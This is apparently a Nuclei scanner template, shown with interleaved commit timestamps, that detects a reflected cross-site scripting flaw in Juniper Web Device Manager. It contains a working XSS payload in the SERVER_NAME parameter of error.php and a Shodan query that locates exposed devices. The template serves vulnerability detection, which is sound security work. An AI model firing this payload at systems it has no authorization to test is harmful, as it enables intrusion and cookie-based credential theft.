2022-10-28 15:37:02 +00:00
id : juniper-web-xss
2022-10-28 14:58:55 +00:00
info :
2022-10-28 15:37:02 +00:00
name : Juniper Web Device Manager - Cross-Site Scripting
2022-10-28 14:58:55 +00:00
author : EvergreenCartoons
severity : high
2022-10-28 15:37:02 +00:00
description : Juniper Web Device Manager contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
2022-10-28 14:58:55 +00:00
reference :
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score : 7.2
cwe-id : CWE-79
2022-10-28 15:37:47 +00:00
metadata :
verified : true
shodan-query : title:"Juniper Web Device Manager"
2022-10-28 15:37:02 +00:00
tags : xss,juniper
2022-10-28 14:58:55 +00:00
requests :
- method : GET
path :
2022-10-28 15:37:02 +00:00
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
2022-10-28 14:58:55 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-10-28 15:37:02 +00:00
words :
- "<script>alert(document.domain)</script>"
- "The requested resource is not authorized to view"
condition : and
2022-10-28 14:58:55 +00:00
- type : word
words :
- "text/html"
part : header
2022-10-28 15:37:02 +00:00
- type : status
status :
- 200